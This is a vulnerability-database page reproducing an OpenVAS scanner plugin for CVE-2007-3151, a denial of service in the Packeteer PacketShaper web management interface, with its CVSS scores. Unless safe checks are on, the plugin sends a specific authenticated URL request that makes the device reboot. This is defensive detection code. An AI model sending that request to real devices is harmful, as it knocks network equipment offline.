Lucene search

K
openvasCopyright (C) 2008 nnposterOPENVAS:136141256231080030
HistoryOct 24, 2008 - 12:00 a.m.

Packeteer PacketShaper Web DoS Vulnerability (CVE-2007-3151)

2008-10-2400:00:00
Copyright (C) 2008 nnposter
plugins.openvas.org
12

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

AI Score

6.5

Confidence

Low

EPSS

0.122

Percentile

95.4%

Packeteer PacketShaper is susceptible to a denial of service
vulnerability in the web management interface.

# SPDX-FileCopyrightText: 2008 nnposter
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.80030");
  script_version("2024-07-23T05:05:30+0000");
  script_tag(name:"last_modification", value:"2024-07-23 05:05:30 +0000 (Tue, 23 Jul 2024)");
  script_tag(name:"creation_date", value:"2008-10-24 20:15:31 +0200 (Fri, 24 Oct 2008)");
  script_tag(name:"cvss_base", value:"5.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:P");
  script_cve_id("CVE-2007-3151");
  script_xref(name:"OSVDB", value:"37230");
  script_name("Packeteer PacketShaper Web DoS Vulnerability (CVE-2007-3151)");
  script_family("Web application abuses");
  script_category(ACT_MIXED_ATTACK);
  script_copyright("Copyright (C) 2008 nnposter");
  script_dependencies("packeteer_web_version.nasl");
  script_require_ports("Services/www", 80);
  script_mandatory_keys("bluecoat_packetshaper/installed");

  script_tag(name:"summary", value:"Packeteer PacketShaper is susceptible to a denial of service
  vulnerability in the web management interface.");

  script_tag(name:"impact", value:"Requesting a specific URL will cause the device to reboot. The
  user must first log in but even read-only access is sufficient.");

  script_tag(name:"solution", value:"Restrict network access to the device management interfaces.");

  script_xref(name:"URL", value:"http://www.securityfocus.com/archive/1/470835/30/0/threaded");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/24388");

  script_tag(name:"qod_type", value:"remote_analysis");
  script_tag(name:"solution_type", value:"Mitigation");

  exit(0);
}

# Notes:
# - Does not work with http_keepalive_send_recv() for some reason.
#   Resorting to http_send_recv()

include("http_func.inc");
include("port_service_func.inc");

if (!get_kb_item("bluecoat_packetshaper/installed"))
  exit(0);

function set_cookie (data,cookie)
{
  local_var EOL,req;
  EOL = '\r\n';
  req = ereg_replace(string:data, pattern:EOL + 'Cookie:[^\r\n]+', replace:"");
  req = ereg_replace(string:req, pattern:EOL + EOL, replace:EOL + cookie + EOL);
  return req;
}

function get_version_snmp ()
{
  local_var sys,match,ver;
  sys = snmp_get_sysdescr(port:161);
  if (!sys) return;
  match = eregmatch(pattern:"^Packeteer PacketShaper ([A-Za-z0-9.]+)", string:sys);
  ver = match[1];
  if (!ver)
    return;
  return ver;
}

port = http_get_port(default:80);
product = get_kb_item("www/" + port + "/packeteer");
if(!product || product != "PacketShaper")
  exit(0);

if (safe_checks()) {

  KNOWN_BROKEN_VERSION = "7.5.1g1";
  version = get_kb_item("www/" + port + "/packeteer/version");
  if (version && version =~ "^([0-6]\.|7\.([0-4]\.|5\.(0|1([a-f]|g0))))") {
    report = string("The vulnerability has not been tested. The assessment is based solely on the device software version, which is ", version, "." );
    security_message(port:port, data:report);
    exit(0);
  }
  exit(99);
}

cookie = get_kb_item("/tmp/http/auth/" + port);
if (!cookie)
  exit(0);

if (http_is_dead(port:port))
  exit(0);

req = http_get(item:"/rpttop.htm?OP.MEAS.DATAQUERY=&MEAS.TYPE=", port:port);
resp = http_send_recv(port:port, data:set_cookie(data:req, cookie:cookie));
if (!http_is_dead(port:port))
  exit(0);

security_message(port:port);
exit(0);

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

AI Score

6.5

Confidence

Low

EPSS

0.122

Percentile

95.4%

Related for OPENVAS:136141256231080030